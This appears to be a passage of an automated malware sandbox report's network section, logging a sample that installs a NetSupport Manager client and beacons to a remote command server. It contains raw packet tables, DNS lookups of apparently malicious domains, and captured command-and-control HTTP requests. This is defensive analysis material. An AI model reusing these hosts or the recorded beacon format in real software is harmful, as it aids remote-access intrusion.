                                                                                                                            Mar 21, 2023 08:00:12.881966114 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.881982088 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.882041931 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.882054090 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.882639885 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.884723902 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.884754896 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.884839058 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.884876966 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.884898901 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.884929895 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.885020971 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.887923956 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.887957096 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.888024092 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.888044119 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:12.888082027 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:12.888130903 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.059883118 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.059917927 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060035944 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.060061932 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060333014 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060375929 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060434103 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.060446978 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060462952 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.060811996 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060836077 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060898066 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.060913086 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.060939074 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.060966969 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.061820030 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.061901093 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.061975956 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.061986923 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.062006950 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.062036037 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.062378883 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.062441111 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.062510014 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.062515974 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.062563896 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.065483093 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.065517902 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.065579891 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.065597057 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.065628052 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.065645933 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.065813065 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.065835953 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.065875053 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.065880060 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.065906048 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.065929890 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.068733931 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.068768024 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.068875074 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.068892956 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.068921089 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.068943977 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.069231033 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.069256067 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.069319010 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.069325924 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.069372892 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.069391966 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.242187023 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.242223024 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.242347002 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.242374897 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.242412090 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.242430925 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.242990017 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243035078 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243087053 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243108034 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243138075 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243158102 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243222952 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243254900 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243285894 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243298054 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243326902 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243351936 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243803978 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243833065 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243890047 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243911028 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.243931055 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.243954897 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.245342016 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.245377064 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.245486975 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.245486975 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.245508909 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.245563030 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.246836901 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.246901035 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.246933937 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.246963024 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.247003078 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.247029066 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.247061014 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.247098923 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.247112989 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.247127056 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.247148991 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.249816895 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.249872923 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.249949932 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.249972105 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.249989033 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.249993086 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.250031948 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.250034094 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.250047922 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.250071049 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.250107050 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.250140905 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.423167944 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.423193932 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.423312902 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.423341036 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.423434973 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.423917055 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.423939943 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.423993111 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424010992 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424037933 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424061060 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424192905 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424213886 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424282074 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424294949 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424319983 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424340010 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424598932 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424622059 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424684048 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424701929 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.424722910 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.424741983 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.425628901 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.425683022 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.425771952 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.425791979 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.425810099 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.425832987 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.427994967 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.428015947 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.428137064 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.428164005 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.428184032 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.428306103 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.428340912 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.428373098 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.428388119 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.428420067 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.428459883 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.431061029 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.431092024 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.431262970 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.431284904 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.431524038 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.603873014 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.603904009 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.603965044 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604010105 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.604064941 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604106903 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.604134083 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.604613066 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604643106 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604736090 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.604739904 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604756117 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604804993 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604856014 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.604882956 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.604944944 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.605017900 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.605102062 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.605142117 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.605159998 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.605192900 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.605236053 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.606362104 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.606450081 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.606484890 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.606508970 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.606566906 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.607309103 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.608586073 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.608618975 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.608867884 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.608889103 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.609231949 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.609277010 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.609297037 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.609318972 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.609373093 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.609373093 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.609416008 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.611861944 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.611890078 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.611941099 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.611982107 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.612004995 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.612030983 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.612031937 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:13.612082958 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.612715960 CET49696443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:13.612746000 CET44349696198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:01:11.664685965 CET496972552192.168.2.4109.107.178.106
                                                                                                                            Mar 21, 2023 08:01:11.746469975 CET255249697109.107.178.106192.168.2.4
                                                                                                                            Mar 21, 2023 08:02:00.377739906 CET4969880192.168.2.451.142.119.24
                                                                                                                            Mar 21, 2023 08:02:00.408569098 CET804969851.142.119.24192.168.2.4
                                                                                                                            Mar 21, 2023 08:02:00.409158945 CET4969880192.168.2.451.142.119.24
                                                                                                                            Mar 21, 2023 08:02:11.789227962 CET496972552192.168.2.4109.107.178.106
                                                                                                                            Mar 21, 2023 08:02:11.863023996 CET255249697109.107.178.106192.168.2.4
                                                                                                                            Mar 21, 2023 08:03:11.906603098 CET496972552192.168.2.4109.107.178.106
                                                                                                                            Mar 21, 2023 08:03:11.985579967 CET255249697109.107.178.106192.168.2.4
                                                                                                                            Mar 21, 2023 08:03:32.688534975 CET4969980192.168.2.482.118.23.50
                                                                                                                            Mar 21, 2023 08:03:35.689212084 CET4969980192.168.2.482.118.23.50
                                                                                                                            Mar 21, 2023 08:03:41.696626902 CET4969980192.168.2.482.118.23.50
                                                                                                                            Mar 21, 2023 08:03:53.851116896 CET4970080192.168.2.482.118.23.50
                                                                                                                            Mar 21, 2023 08:03:56.856786013 CET4970080192.168.2.482.118.23.50
                                                                                                                            Mar 21, 2023 08:04:02.857343912 CET4970080192.168.2.482.118.23.50

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Mar 21, 2023 08:00:04.072413921 CET5657253192.168.2.48.8.8.8
                                                                                                                            Mar 21, 2023 08:00:04.090253115 CET53565728.8.8.8192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:09.934883118 CET5091153192.168.2.48.8.8.8
                                                                                                                            Mar 21, 2023 08:00:10.319967031 CET53509118.8.8.8192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:11.273303032 CET5968353192.168.2.48.8.8.8
                                                                                                                            Mar 21, 2023 08:00:11.296411991 CET53596838.8.8.8192.168.2.4
                                                                                                                            Mar 21, 2023 08:02:54.109672070 CET6416753192.168.2.48.8.8.8
                                                                                                                            Mar 21, 2023 08:02:54.129509926 CET53641678.8.8.8192.168.2.4

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Mar 21, 2023 08:00:04.072413921 CET192.168.2.48.8.8.80x88fcStandard query (0)mediainfotv.xyzA (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:00:09.934883118 CET192.168.2.48.8.8.80x4f89Standard query (0)upl0ad3d.comA (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:00:11.273303032 CET192.168.2.48.8.8.80xa5bfStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:02:54.109672070 CET192.168.2.48.8.8.80x63a2Standard query (0)tOetxOrXardQngRI.tOetxOrXardQngRIA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Mar 21, 2023 08:00:04.090253115 CET8.8.8.8192.168.2.40x88fcNo error (0)mediainfotv.xyz198.54.121.245A (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:00:10.319967031 CET8.8.8.8192.168.2.40x4f89No error (0)upl0ad3d.com109.107.178.106A (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:00:11.296411991 CET8.8.8.8192.168.2.40xa5bfNo error (0)geo.netsupportsoftware.comgeography.netsupportsoftware.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:00:11.296411991 CET8.8.8.8192.168.2.40xa5bfNo error (0)geography.netsupportsoftware.com51.142.119.24A (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:00:11.296411991 CET8.8.8.8192.168.2.40xa5bfNo error (0)geography.netsupportsoftware.com62.172.138.67A (IP address)IN (0x0001)false
                                                                                                                            Mar 21, 2023 08:02:54.129509926 CET8.8.8.8192.168.2.40x63a2Name error (3)tOetxOrXardQngRI.tOetxOrXardQngRInonenoneA (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • mediainfotv.xyz
                                                                                                                            • 109.107.178.106connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                            • 109.107.178.106connection: keep-alivecmd=encdes=1data=u2hr4]%y-=id3wi7?=@ff&t[6ral4v=il`w#rtr5=ifksjds(mqyz8=ioaiv{rsm%=n;#j2b=m;w6x^s{ijr*9w_z8a ]
                                                                                                                            • 109.107.178.106connection: keep-alivecmd=encdes=1data=l3<(t{evk9|||$(m$cwu-=i?sq
                                                                                                                            • geo.netsupportsoftware.com
                                                                                                                            • 109.107.178.106connection: keep-alivecmd=encdes=1data=#mhuaag

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.449695198.54.121.245443C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.449696198.54.121.245443C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            2192.168.2.449697109.107.178.1062552C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Mar 21, 2023 08:00:10.705027103 CET2531OUTPOST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 109.107.178.106Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:00:10.733284950 CET2548INHTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 60Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \Wbb)w}oXxf
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:00:11.275266886 CET3088OUTPOST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 235Host: 109.107.178.106Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raL4V=Il`w#rtr5=IfKsJDs(MQYz8=IOaiV{rSM%=n;#j2B=M;W6X^S{iJR*9W_z8A ]
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:00:11.303505898 CET3089INHTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 152Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~7s4}X),,Dq,()4]%y-A9H=n :!b<DmwN\{'u=@>$Rb'h[TjI
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:00:11.625982046 CET3400OUTPOST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 77Host: 109.107.178.106Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9|||$(m$CwU-=I?sq
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:01:11.664685965 CET5173OUTPOST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 109.107.178.106Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:02:11.789227962 CET5174OUTPOST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 109.107.178.106Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Mar 21, 2023 08:03:11.906603098 CET5174OUTPOST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 109.107.178.106Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            3192.168.2.44969851.142.119.2480C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Mar 21, 2023 08:00:12.542290926 CET4284OUTGET /location/loca.asp HTTP/1.1
                                                                                                                            Host: geo.netsupportsoftware.com
                                                                                                                            Connection: Keep-Alive
